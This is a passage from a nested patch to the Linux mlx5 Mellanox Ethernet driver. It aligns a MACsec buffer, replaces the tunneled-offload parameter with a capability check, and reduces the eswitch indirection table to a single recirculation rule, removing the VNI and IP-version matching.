+-		esw_attr->rx_tun_attr->vni = MLX5_GET(fte_match_param, spec->match_value,
+-						      misc_parameters.vxlan_vni);
+ 		esw_attr->rx_tun_attr->decap_vport = vport_num;
+ 	} else if (netif_is_ovs_master(attr.route_dev) && mlx5e_tc_int_port_supported(esw)) {
+ 		int_port = mlx5e_tc_int_port_get(mlx5e_get_int_port_priv(priv),
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index b92d541b5286e..0c23340bfcc75 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -89,8 +89,8 @@ struct mlx5e_macsec_rx_sc {
+ };
+ 
+ struct mlx5e_macsec_umr {
++	u8 __aligned(64) ctx[MLX5_ST_SZ_BYTES(macsec_aso)];
+ 	dma_addr_t dma_addr;
+-	u8 ctx[MLX5_ST_SZ_BYTES(macsec_aso)];
+ 	u32 mkey;
+ };
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 142ed2d98cd5d..609a49c1e09e6 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4911,8 +4911,6 @@ void mlx5e_build_nic_params(struct mlx5e_priv *priv, struct mlx5e_xsk *xsk, u16
+ 	/* TX inline */
+ 	mlx5_query_min_inline(mdev, &params->tx_min_inline_mode);
+ 
+-	params->tunneled_offload_en = mlx5_tunnel_inner_ft_supported(mdev);
+-
+ 	/* AF_XDP */
+ 	params->xsk = xsk;
+ 
+@@ -5216,7 +5214,7 @@ static int mlx5e_init_nic_rx(struct mlx5e_priv *priv)
+ 	}
+ 
+ 	features = MLX5E_RX_RES_FEATURE_PTP;
+-	if (priv->channels.params.tunneled_offload_en)
++	if (mlx5_tunnel_inner_ft_supported(mdev))
+ 		features |= MLX5E_RX_RES_FEATURE_INNER_FT;
+ 	err = mlx5e_rx_res_init(priv->rx_res, priv->mdev, features,
+ 				priv->max_nch, priv->drop_rq.rqn,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index 794cd8dfe9c91..0f744131c6869 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -707,7 +707,6 @@ static void mlx5e_build_rep_params(struct net_device *netdev)
+ 	mlx5e_set_rx_cq_mode_params(params, cq_period_mode);
+ 
+ 	params->mqprio.num_tc       = 1;
+-	params->tunneled_offload_en = false;
+ 	if (rep->vport != MLX5_VPORT_UPLINK)
+ 		params->vlan_strip_disable = true;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index c1cf3917baa43..73af062a87830 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -2401,13 +2401,13 @@ static int parse_tunnel_attr(struct mlx5e_priv *priv,
+ 		err = mlx5e_tc_set_attr_rx_tun(flow, spec);
+ 		if (err)
+ 			return err;
+-	} else if (tunnel && tunnel->tunnel_type == MLX5E_TC_TUNNEL_TYPE_VXLAN) {
++	} else if (tunnel) {
+ 		struct mlx5_flow_spec *tmp_spec;
+ 
+ 		tmp_spec = kvzalloc(sizeof(*tmp_spec), GFP_KERNEL);
+ 		if (!tmp_spec) {
+-			NL_SET_ERR_MSG_MOD(extack, "Failed to allocate memory for vxlan tmp spec");
+-			netdev_warn(priv->netdev, "Failed to allocate memory for vxlan tmp spec");
++			NL_SET_ERR_MSG_MOD(extack, "Failed to allocate memory for tunnel tmp spec");
++			netdev_warn(priv->netdev, "Failed to allocate memory for tunnel tmp spec");
+ 			return -ENOMEM;
+ 		}
+ 		memcpy(tmp_spec, spec, sizeof(*tmp_spec));
+@@ -4054,6 +4054,7 @@ int mlx5e_set_fwd_to_int_port_actions(struct mlx5e_priv *priv,
+ 
+ 	esw_attr->dest_int_port = dest_int_port;
+ 	esw_attr->dests[out_index].flags |= MLX5_ESW_DEST_CHAIN_WITH_SRC_PORT_CHANGE;
++	esw_attr->split_count = out_index;
+ 
+ 	/* Forward to root fdb for matching against the new source vport */
+ 	attr->dest_chain = 0;
+@@ -4311,9 +4312,6 @@ __mlx5e_add_fdb_flow(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto err_free;
+ 
+-	/* always set IP version for indirect table handling */
+-	flow->attr->ip_version = mlx5e_tc_get_ip_version(&parse_attr->spec, true);
+-
+ 	err = parse_tc_fdb_actions(priv, &rule->action, flow, extack);
+ 	if (err)
+ 		goto err_free;
+@@ -5162,6 +5160,16 @@ err_tun_mapping:
+ 
+ void mlx5e_tc_esw_cleanup(struct mlx5_rep_uplink_priv *uplink_priv)
+ {
++	struct mlx5e_rep_priv *rpriv;
++	struct mlx5_eswitch *esw;
++	struct mlx5e_priv *priv;
++
++	rpriv = container_of(uplink_priv, struct mlx5e_rep_priv, uplink_priv);
++	priv = netdev_priv(rpriv->netdev);
++	esw = priv->mdev->priv.eswitch;
++
++	mlx5e_tc_clean_fdb_peer_flows(esw);
++
+ 	mlx5e_tc_tun_cleanup(uplink_priv->encap);
+ 
+ 	mapping_destroy(uplink_priv->tunnel_enc_opts_mapping);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.h b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.h
+index 48241317a5354..edd5f09440f9f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.h
+@@ -82,7 +82,6 @@ struct mlx5_flow_attr {
+ 	struct mlx5_flow_table *dest_ft;
+ 	u8 inner_match_level;
+ 	u8 outer_match_level;
+-	u8 ip_version;
+ 	u8 tun_ip_version;
+ 	int tunnel_id; /* mapped tunnel id */
+ 	u32 flags;
+@@ -129,7 +128,6 @@ struct mlx5_rx_tun_attr {
+ 		__be32 v4;
+ 		struct in6_addr v6;
+ 	} dst_ip; /* Valid if decap_vport is not zero */
+-	u32 vni;
+ };
+ 
+ #define MLX5E_TC_TABLE_CHAIN_TAG_BITS 16
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.c
+index c9a91158e99c9..8a94870c5b43c 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.c
+@@ -16,18 +16,12 @@
+ #include "lib/fs_chains.h"
+ #include "en/mod_hdr.h"
+ 
+-#define MLX5_ESW_INDIR_TABLE_SIZE 128
+-#define MLX5_ESW_INDIR_TABLE_RECIRC_IDX_MAX (MLX5_ESW_INDIR_TABLE_SIZE - 2)
++#define MLX5_ESW_INDIR_TABLE_SIZE 2
++#define MLX5_ESW_INDIR_TABLE_RECIRC_IDX (MLX5_ESW_INDIR_TABLE_SIZE - 2)
+ #define MLX5_ESW_INDIR_TABLE_FWD_IDX (MLX5_ESW_INDIR_TABLE_SIZE - 1)
+ 
+ struct mlx5_esw_indir_table_rule {
+-	struct list_head list;
+ 	struct mlx5_flow_handle *handle;
+-	union {
+-		__be32 v4;
+-		struct in6_addr v6;
+-	} dst_ip;
+-	u32 vni;
+ 	struct mlx5_modify_hdr *mh;
+ 	refcount_t refcnt;
+ };
+@@ -38,12 +32,10 @@ struct mlx5_esw_indir_table_entry {
+ 	struct mlx5_flow_group *recirc_grp;
+ 	struct mlx5_flow_group *fwd_grp;
+ 	struct mlx5_flow_handle *fwd_rule;
+-	struct list_head recirc_rules;
+-	int recirc_cnt;
++	struct mlx5_esw_indir_table_rule *recirc_rule;
+ 	int fwd_ref;
+ 
+ 	u16 vport;
+-	u8 ip_version;
+ };
+ 
+ struct mlx5_esw_indir_table {
+@@ -89,7 +81,6 @@ mlx5_esw_indir_table_needed(struct mlx5_eswitch *esw,
+ 	return esw_attr->in_rep->vport == MLX5_VPORT_UPLINK &&
+ 		vf_sf_vport &&
+ 		esw->dev == dest_mdev &&
+-		attr->ip_version &&
+ 		attr->flags & MLX5_ATTR_FLAG_SRC_REWRITE;
+ }
+ 
+@@ -101,27 +92,8 @@ mlx5_esw_indir_table_decap_vport(struct mlx5_flow_attr *attr)
+ 	return esw_attr->rx_tun_attr ? esw_attr->rx_tun_attr->decap_vport : 0;
+ }
+ 
+-static struct mlx5_esw_indir_table_rule *
+-mlx5_esw_indir_table_rule_lookup(struct mlx5_esw_indir_table_entry *e,
+-				 struct mlx5_esw_flow_attr *attr)
+-{
+-	struct mlx5_esw_indir_table_rule *rule;
+-
+-	list_for_each_entry(rule, &e->recirc_rules, list)
+-		if (rule->vni == attr->rx_tun_attr->vni &&
+-		    !memcmp(&rule->dst_ip, &attr->rx_tun_attr->dst_ip,
+-			    sizeof(attr->rx_tun_attr->dst_ip)))
+-			goto found;
+-	return NULL;
+-
+-found:
+-	refcount_inc(&rule->refcnt);
+-	return rule;
+-}
+-
+ static int mlx5_esw_indir_table_rule_get(struct mlx5_eswitch *esw,
+ 					 struct mlx5_flow_attr *attr,
+-					 struct mlx5_flow_spec *spec,
+ 					 struct mlx5_esw_indir_table_entry *e)
+ {
+ 	struct mlx5_esw_flow_attr *esw_attr = attr->esw_attr;
+@@ -130,73 +102,18 @@ static int mlx5_esw_indir_table_rule_get(struct mlx5_eswitch *esw,
+ 	struct mlx5_flow_destination dest = {};
+ 	struct mlx5_esw_indir_table_rule *rule;
+ 	struct mlx5_flow_act flow_act = {};
+-	struct mlx5_flow_spec *rule_spec;
+ 	struct mlx5_flow_handle *handle;
+ 	int err = 0;
+ 	u32 data;
+ 
+-	rule = mlx5_esw_indir_table_rule_lookup(e, esw_attr);
+-	if (rule)
++	if (e->recirc_rule) {
++		refcount_inc(&e->recirc_rule->refcnt);
+ 		return 0;
+-
+-	if (e->recirc_cnt == MLX5_ESW_INDIR_TABLE_RECIRC_IDX_MAX)
+-		return -EINVAL;
+-
+-	rule_spec = kvzalloc(sizeof(*rule_spec), GFP_KERNEL);
+-	if (!rule_spec)
+-		return -ENOMEM;
+-
+-	rule = kzalloc(sizeof(*rule), GFP_KERNEL);
+-	if (!rule) {
+-		err = -ENOMEM;
+-		goto out;
+ 	}
+ 
+-	rule_spec->match_criteria_enable = MLX5_MATCH_OUTER_HEADERS |
+-					   MLX5_MATCH_MISC_PARAMETERS |
+-					   MLX5_MATCH_MISC_PARAMETERS_2;
+-	if (MLX5_CAP_FLOWTABLE_NIC_RX(esw->dev, ft_field_support.outer_ip_version)) {
+-		MLX5_SET(fte_match_param, rule_spec->match_criteria,
+-			 outer_headers.ip_version, 0xf);
+-		MLX5_SET(fte_match_param, rule_spec->match_value, outer_headers.ip_version,
+-			 attr->ip_version);
+-	} else if (attr->ip_version) {
+-		MLX5_SET_TO_ONES(fte_match_param, rule_spec->match_criteria,
+-				 outer_headers.ethertype);
+-		MLX5_SET(fte_match_param, rule_spec->match_value, outer_headers.ethertype,
+-			 (attr->ip_version == 4 ? ETH_P_IP : ETH_P_IPV6));
+-	} else {
+-		err = -EOPNOTSUPP;
+-		goto err_ethertype;
+-	}
+-
+-	if (attr->ip_version == 4) {
+-		MLX5_SET_TO_ONES(fte_match_param, rule_spec->match_criteria,
+-				 outer_headers.dst_ipv4_dst_ipv6.ipv4_layout.ipv4);
+-		MLX5_SET(fte_match_param, rule_spec->match_value,
+-			 outer_headers.dst_ipv4_dst_ipv6.ipv4_layout.ipv4,
+-			 ntohl(esw_attr->rx_tun_attr->dst_ip.v4));
+-	} else if (attr->ip_version == 6) {
+-		int len = sizeof(struct in6_addr);
+-
+-		memset(MLX5_ADDR_OF(fte_match_param, rule_spec->match_criteria,
+-				    outer_headers.dst_ipv4_dst_ipv6.ipv6_layout.ipv6),
+-		       0xff, len);
+-		memcpy(MLX5_ADDR_OF(fte_match_param, rule_spec->match_value,
+-				    outer_headers.dst_ipv4_dst_ipv6.ipv6_layout.ipv6),
+-		       &esw_attr->rx_tun_attr->dst_ip.v6, len);
+-	}
+-
+-	MLX5_SET_TO_ONES(fte_match_param, rule_spec->match_criteria,
+-			 misc_parameters.vxlan_vni);
+-	MLX5_SET(fte_match_param, rule_spec->match_value, misc_parameters.vxlan_vni,
+-		 MLX5_GET(fte_match_param, spec->match_value, misc_parameters.vxlan_vni));
+-
+-	MLX5_SET(fte_match_param, rule_spec->match_criteria,
+-		 misc_parameters_2.metadata_reg_c_0, mlx5_eswitch_get_vport_metadata_mask());
+-	MLX5_SET(fte_match_param, rule_spec->match_value, misc_parameters_2.metadata_reg_c_0,
+-		 mlx5_eswitch_get_vport_metadata_for_match(esw_attr->in_mdev->priv.eswitch,
+-							   MLX5_VPORT_UPLINK));
++	rule = kzalloc(sizeof(*rule), GFP_KERNEL);
++	if (!rule)
++		return -ENOMEM;
+ 
+ 	/* Modify flow source to recirculate packet */
+ 	data = mlx5_eswitch_get_vport_metadata_for_set(esw, esw_attr->rx_tun_attr->decap_vport);
+@@ -219,13 +136,14 @@ static int mlx5_esw_indir_table_rule_get(struct mlx5_eswitch *esw,
+ 
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST | MLX5_FLOW_CONTEXT_ACTION_MOD_HDR;
+ 	flow_act.flags = FLOW_ACT_IGNORE_FLOW_LEVEL | FLOW_ACT_NO_APPEND;
++	flow_act.fg = e->recirc_grp;
+ 	dest.type = MLX5_FLOW_DESTINATION_TYPE_FLOW_TABLE;
+ 	dest.ft = mlx5_chains_get_table(chains, 0, 1, 0);
+ 	if (IS_ERR(dest.ft)) {
+ 		err = PTR_ERR(dest.ft);
+ 		goto err_table;
+ 	}
+-	handle = mlx5_add_flow_rules(e->ft, rule_spec, &flow_act, &dest, 1);
++	handle = mlx5_add_flow_rules(e->ft, NULL, &flow_act, &dest, 1);
+ 	if (IS_ERR(handle)) {
+ 		err = PTR_ERR(handle);
+ 		goto err_handle;
+@@ -233,14 +151,10 @@ static int mlx5_esw_indir_table_rule_get(struct mlx5_eswitch *esw,
+ 
+ 	mlx5e_mod_hdr_dealloc(&mod_acts);
+ 	rule->handle = handle;
+-	rule->vni = esw_attr->rx_tun_attr->vni;
+ 	rule->mh = flow_act.modify_hdr;
+-	memcpy(&rule->dst_ip, &esw_attr->rx_tun_attr->dst_ip,
+-	       sizeof(esw_attr->rx_tun_attr->dst_ip));
+ 	refcount_set(&rule->refcnt, 1);
+-	list_add(&rule->list, &e->recirc_rules);
+-	e->recirc_cnt++;
+-	goto out;
++	e->recirc_rule = rule;
++	return 0;
+ 
+ err_handle:
+ 	mlx5_chains_put_table(chains, 0, 1, 0);
+@@ -250,89 +164,44 @@ err_mod_hdr_alloc:
+ err_mod_hdr_regc1:
+ 	mlx5e_mod_hdr_dealloc(&mod_acts);
+ err_mod_hdr_regc0:
+-err_ethertype:
+ 	kfree(rule);
+-out:
+-	kvfree(rule_spec);
+ 	return err;
+ }
+ 
+ static void mlx5_esw_indir_table_rule_put(struct mlx5_eswitch *esw,
+-					  struct mlx5_flow_attr *attr,
+ 					  struct mlx5_esw_indir_table_entry *e)
+ {
+-	struct mlx5_esw_flow_attr *esw_attr = attr->esw_attr;
++	struct mlx5_esw_indir_table_rule *rule = e->recirc_rule;
+ 	struct mlx5_fs_chains *chains = esw_chains(esw);
+-	struct mlx5_esw_indir_table_rule *rule;
+ 
+-	list_for_each_entry(rule, &e->recirc_rules, list)
+-		if (rule->vni == esw_attr->rx_tun_attr->vni &&
+-		    !memcmp(&rule->dst_ip, &esw_attr->rx_tun_attr->dst_ip,
+-			    sizeof(esw_attr->rx_tun_attr->dst_ip)))
+-			goto found;
+-
+-	return;
++	if (!rule)
++		return;
+ 
+-found:
+ 	if (!refcount_dec_and_test(&rule->refcnt))
+ 		return;
+ 
+ 	mlx5_del_flow_rules(rule->handle);
+ 	mlx5_chains_put_table(chains, 0, 1, 0);
+ 	mlx5_modify_header_dealloc(esw->dev, rule->mh);
+-	list_del(&rule->list);
+ 	kfree(rule);
+-	e->recirc_cnt--;
++	e->recirc_rule = NULL;
+ }
+ 
+-static int mlx5_create_indir_recirc_group(struct mlx5_eswitch *esw,
+-					  struct mlx5_flow_attr *attr,
+-					  struct mlx5_flow_spec *spec,
+-					  struct mlx5_esw_indir_table_entry *e)
++static int mlx5_create_indir_recirc_group(struct mlx5_esw_indir_table_entry *e)
+ {
+ 	int err = 0, inlen = MLX5_ST_SZ_BYTES(create_flow_group_in);
+-	u32 *in, *match;
++	u32 *in;
+ 
+ 	in = kvzalloc(inlen, GFP_KERNEL);
+ 	if (!in)
+ 		return -ENOMEM;
+ 
+-	MLX5_SET(create_flow_group_in, in, match_criteria_enable, MLX5_MATCH_OUTER_HEADERS |
+-		 MLX5_MATCH_MISC_PARAMETERS | MLX5_MATCH_MISC_PARAMETERS_2);
+-	match = MLX5_ADDR_OF(create_flow_group_in, in, match_criteria);
+-
+-	if (MLX5_CAP_FLOWTABLE_NIC_RX(esw->dev, ft_field_support.outer_ip_version))
+-		MLX5_SET(fte_match_param, match, outer_headers.ip_version, 0xf);
+-	else
+-		MLX5_SET_TO_ONES(fte_match_param, match, outer_headers.ethertype);
+-
+-	if (attr->ip_version == 4) {
+-		MLX5_SET_TO_ONES(fte_match_param, match,
+-				 outer_headers.dst_ipv4_dst_ipv6.ipv4_layout.ipv4);
+-	} else if (attr->ip_version == 6) {
+-		memset(MLX5_ADDR_OF(fte_match_param, match,
+-				    outer_headers.dst_ipv4_dst_ipv6.ipv6_layout.ipv6),
+-		       0xff, sizeof(struct in6_addr));
+-	} else {
+-		err = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	MLX5_SET_TO_ONES(fte_match_param, match, misc_parameters.vxlan_vni);
+-	MLX5_SET(fte_match_param, match, misc_parameters_2.metadata_reg_c_0,
+-		 mlx5_eswitch_get_vport_metadata_mask());
+ 	MLX5_SET(create_flow_group_in, in, start_flow_index, 0);
+-	MLX5_SET(create_flow_group_in, in, end_flow_index, MLX5_ESW_INDIR_TABLE_RECIRC_IDX_MAX);
++	MLX5_SET(create_flow_group_in, in, end_flow_index, MLX5_ESW_INDIR_TABLE_RECIRC_IDX);
+ 	e->recirc_grp = mlx5_create_flow_group(e->ft, in);
+-	if (IS_ERR(e->recirc_grp)) {
++	if (IS_ERR(e->recirc_grp))
+ 		err = PTR_ERR(e->recirc_grp);
+-		goto out;
+-	}
+ 
+-	INIT_LIST_HEAD(&e->recirc_rules);
+-	e->recirc_cnt = 0;
+-
+-out:
+ 	kvfree(in);
+ 	return err;
+ }
+@@ -366,6 +235,7 @@ static int mlx5_create_indir_fwd_group(struct mlx5_eswitch *esw,
+ 	}
+ 
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
++	flow_act.fg = e->fwd_grp;
+ 	dest.type = MLX5_FLOW_DESTINATION_TYPE_VPORT;
+ 	dest.vport.num = e->vport;
+ 	dest.vport.vhca_id = MLX5_CAP_GEN(esw->dev, vhca_id);
+@@ -384,7 +254,7 @@ err_out:
+ 
+ static struct mlx5_esw_indir_table_entry *
+ mlx5_esw_indir_table_entry_create(struct mlx5_eswitch *esw, struct mlx5_flow_attr *attr,
+-				  struct mlx5_flow_spec *spec, u16 vport, bool decap)
++				  u16 vport, bool decap)
+ {
+ 	struct mlx5_flow_table_attr ft_attr = {};
+ 	struct mlx5_flow_namespace *root_ns;
+@@ -412,15 +282,14 @@ mlx5_esw_indir_table_entry_create(struct mlx5_eswitch *esw, struct mlx5_flow_att
+ 	}
+ 	e->ft = ft;
+ 	e->vport = vport;
+-	e->ip_version = attr->ip_version;
+ 	e->fwd_ref = !decap;
+ 
+-	err = mlx5_create_indir_recirc_group(esw, attr, spec, e);
++	err = mlx5_create_indir_recirc_group(e);
+ 	if (err)
+ 		goto recirc_grp_err;
+ 
+ 	if (decap) {
+-		err = mlx5_esw_indir_table_rule_get(esw, attr, spec, e);
++		err = mlx5_esw_indir_table_rule_get(esw, attr, e);
+ 		if (err)
+ 			goto recirc_rule_err;
+ 	}
+@@ -430,13 +299,13 @@ mlx5_esw_indir_table_entry_create(struct mlx5_eswitch *esw, struct mlx5_flow_att
+ 		goto fwd_grp_err;
+ 
+ 	hash_add(esw->fdb_table.offloads.indir->table, &e->hlist,
+-		 vport << 16 | attr->ip_version);
++		 vport << 16);
+ 
+ 	return e;
+ 
+ fwd_grp_err:
+ 	if (decap)
+-		mlx5_esw_indir_table_rule_put(esw, attr, e);
++		mlx5_esw_indir_table_rule_put(esw, e);
+ recirc_rule_err:
+ 	mlx5_destroy_flow_group(e->recirc_grp);
+ recirc_grp_err:
+@@ -447,13 +316,13 @@ tbl_err:
+ }
+ 
+ static struct mlx5_esw_indir_table_entry *
+-mlx5_esw_indir_table_entry_lookup(struct mlx5_eswitch *esw, u16 vport, u8 ip_version)
++mlx5_esw_indir_table_entry_lookup(struct mlx5_eswitch *esw, u16 vport)
+ {
+ 	struct mlx5_esw_indir_table_entry *e;
+-	u32 key = vport << 16 | ip_version;
++	u32 key = vport << 16;
+ 
+ 	hash_for_each_possible(esw->fdb_table.offloads.indir->table, e, hlist, key)
+-		if (e->vport == vport && e->ip_version == ip_version)
++		if (e->vport == vport)
+ 			return e;
+ 
+ 	return NULL;
+@@ -461,24 +330,23 @@ mlx5_esw_indir_table_entry_lookup(struct mlx5_eswitch *esw, u16 vport, u8 ip_ver
+ 
+ struct mlx5_flow_table *mlx5_esw_indir_table_get(struct mlx5_eswitch *esw,
+ 						 struct mlx5_flow_attr *attr,
+-						 struct mlx5_flow_spec *spec,
+ 						 u16 vport, bool decap)
+ {
+ 	struct mlx5_esw_indir_table_entry *e;
+ 	int err;
+ 
+ 	mutex_lock(&esw->fdb_table.offloads.indir->lock);
+-	e = mlx5_esw_indir_table_entry_lookup(esw, vport, attr->ip_version);
++	e = mlx5_esw_indir_table_entry_lookup(esw, vport);
+ 	if (e) {
+ 		if (!decap) {
+ 			e->fwd_ref++;
+ 		} else {
+-			err = mlx5_esw_indir_table_rule_get(esw, attr, spec, e);
++			err = mlx5_esw_indir_table_rule_get(esw, attr, e);
+ 			if (err)
+ 				goto out_err;
+ 		}
+ 	} else {
+-		e = mlx5_esw_indir_table_entry_create(esw, attr, spec, vport, decap);
++		e = mlx5_esw_indir_table_entry_create(esw, attr, vport, decap);
+ 		if (IS_ERR(e)) {
+ 			err = PTR_ERR(e);
+ 			esw_warn(esw->dev, "Failed to create indirection table, err %d.\n", err);
+@@ -494,22 +362,21 @@ out_err:
+ }
+ 
+ void mlx5_esw_indir_table_put(struct mlx5_eswitch *esw,
+-			      struct mlx5_flow_attr *attr,
+ 			      u16 vport, bool decap)
+ {
+ 	struct mlx5_esw_indir_table_entry *e;
+ 
+ 	mutex_lock(&esw->fdb_table.offloads.indir->lock);
+-	e = mlx5_esw_indir_table_entry_lookup(esw, vport, attr->ip_version);
++	e = mlx5_esw_indir_table_entry_lookup(esw, vport);
+ 	if (!e)
+ 		goto out;
+ 
+ 	if (!decap)
+ 		e->fwd_ref--;
+ 	else
+-		mlx5_esw_indir_table_rule_put(esw, attr, e);
++		mlx5_esw_indir_table_rule_put(esw, e);
+ 
+-	if (e->fwd_ref || e->recirc_cnt)
++	if (e->fwd_ref || e->recirc_rule)
+ 		goto out;
+ 
+ 	hash_del(&e->hlist);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.h b/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.h
+index 21d56b49d14bc..036f5b3a341b9 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.h
+@@ -13,10 +13,8 @@ mlx5_esw_indir_table_destroy(struct mlx5_esw_indir_table *indir);
+ 
+ struct mlx5_flow_table *mlx5_esw_indir_table_get(struct mlx5_eswitch *esw,
+ 						 struct mlx5_flow_attr *attr,
+-						 struct mlx5_flow_spec *spec,
+ 						 u16 vport, bool decap);
+ void mlx5_esw_indir_table_put(struct mlx5_eswitch *esw,
+-			      struct mlx5_flow_attr *attr,
+ 			      u16 vport, bool decap);
+ 
+ bool
+@@ -44,7 +42,6 @@ mlx5_esw_indir_table_destroy(struct mlx5_esw_indir_table *indir)
+ static inline struct mlx5_flow_table *
+ mlx5_esw_indir_table_get(struct mlx5_eswitch *esw,
+ 			 struct mlx5_flow_attr *attr,
+-			 struct mlx5_flow_spec *spec,
+ 			 u16 vport, bool decap)
+ {
+ 	return ERR_PTR(-EOPNOTSUPP);
+@@ -52,7 +49,6 @@ mlx5_esw_indir_table_get(struct mlx5_eswitch *esw,
+ 
+ static inline void
+ mlx5_esw_indir_table_put(struct mlx5_eswitch *esw,
+-			 struct mlx5_flow_attr *attr,
+ 			 u16 vport, bool decap)
+ {
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 235f6f0a70523..34790a82a0976 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -178,15 +178,14 @@ mlx5_eswitch_set_rule_source_port(struct mlx5_eswitch *esw,
+ 
+ static int
+ esw_setup_decap_indir(struct mlx5_eswitch *esw,
+-		      struct mlx5_flow_attr *attr,
+-		      struct mlx5_flow_spec *spec)
++		      struct mlx5_flow_attr *attr)
+ {
+ 	struct mlx5_flow_table *ft;
+ 
+ 	if (!(attr->flags & MLX5_ATTR_FLAG_SRC_REWRITE))
+ 		return -EOPNOTSUPP;
+ 
+-	ft = mlx5_esw_indir_table_get(esw, attr, spec,
++	ft = mlx5_esw_indir_table_get(esw, attr,
+ 				      mlx5_esw_indir_table_decap_vport(attr), true);
+ 	return PTR_ERR_OR_ZERO(ft);
+ }
+@@ -196,7 +195,7 @@ esw_cleanup_decap_indir(struct mlx5_eswitch *esw,
+ 			struct mlx5_flow_attr *attr)
+ {
+ 	if (mlx5_esw_indir_table_decap_vport(attr))
+-		mlx5_esw_indir_table_put(esw, attr,
++		mlx5_esw_indir_table_put(esw,
+ 					 mlx5_esw_indir_table_decap_vport(attr),
+ 					 true);
+ }
+@@ -219,7 +218,6 @@ esw_setup_ft_dest(struct mlx5_flow_destination *dest,
+ 		  struct mlx5_flow_act *flow_act,
+ 		  struct mlx5_eswitch *esw,
+ 		  struct mlx5_flow_attr *attr,
+-		  struct mlx5_flow_spec *spec,
+ 		  int i)
+ {
+ 	flow_act->flags |= FLOW_ACT_IGNORE_FLOW_LEVEL;
+@@ -227,7 +225,7 @@ esw_setup_ft_dest(struct mlx5_flow_destination *dest,
+ 	dest[i].ft = attr->dest_ft;
+ 
+ 	if (mlx5_esw_indir_table_decap_vport(attr))
+-		return esw_setup_decap_indir(esw, attr, spec);
++		return esw_setup_decap_indir(esw, attr);
+ 	return 0;
+ }
+ 
+@@ -282,7 +280,7 @@ static void esw_put_dest_tables_loop(struct mlx5_eswitch *esw, struct mlx5_flow_
+ 			mlx5_chains_put_table(chains, 0, 1, 0);
+ 		else if (mlx5_esw_indir_table_needed(esw, attr, esw_attr->dests[i].rep->vport,
+ 						     esw_attr->dests[i].mdev))
+-			mlx5_esw_indir_table_put(esw, attr, esw_attr->dests[i].rep->vport,
++			mlx5_esw_indir_table_put(esw, esw_attr->dests[i].rep->vport,
+ 						 false);
+ }
+ 
+@@ -368,7 +366,6 @@ esw_setup_indir_table(struct mlx5_flow_destination *dest,
+ 		      struct mlx5_flow_act *flow_act,
+ 		      struct mlx5_eswitch *esw,
+ 		      struct mlx5_flow_attr *attr,
+-		      struct mlx5_flow_spec *spec,
+ 		      bool ignore_flow_lvl,
+ 		      int *i)
+ {
+@@ -383,7 +380,7 @@ esw_setup_indir_table(struct mlx5_flow_destination *dest,
+ 			flow_act->flags |= FLOW_ACT_IGNORE_FLOW_LEVEL;
+ 		dest[*i].type = MLX5_FLOW_DESTINATION_TYPE_FLOW_TABLE;
+ 
+-		dest[*i].ft = mlx5_esw_indir_table_get(esw, attr, spec,
++		dest[*i].ft = mlx5_esw_indir_table_get(esw, attr,
+ 						       esw_attr->dests[j].rep->vport, false);
+ 		if (IS_ERR(dest[*i].ft)) {
+ 			err = PTR_ERR(dest[*i].ft);
+@@ -392,7 +389,7 @@ esw_setup_indir_table(struct mlx5_flow_destination *dest,
+ 	}
+ 
+ 	if (mlx5_esw_indir_table_decap_vport(attr)) {
+-		err = esw_setup_decap_indir(esw, attr, spec);
++		err = esw_setup_decap_indir(esw, attr);
+ 		if (err)
+ 			goto err_indir_tbl_get;
+ 	}
+@@ -490,14 +487,14 @@ esw_setup_dests(struct mlx5_flow_destination *dest,
+ 		esw_setup_accept_dest(dest, flow_act, chains, *i);
+ 		(*i)++;
+ 	} else if (esw_is_indir_table(esw, attr)) {
+-		err = esw_setup_indir_table(dest, flow_act, esw, attr, spec, true, i);
++		err = esw_setup_indir_table(dest, flow_act, esw, attr, true, i);
+ 	} else if (esw_is_chain_src_port_rewrite(esw, esw_attr)) {
+ 		err = esw_setup_chain_src_port_rewrite(dest, flow_act, esw, chains, attr, i);
+ 	} else {
+ 		*i = esw_setup_vport_dests(dest, flow_act, esw, esw_attr, *i);
+ 
+ 		if (attr->dest_ft) {
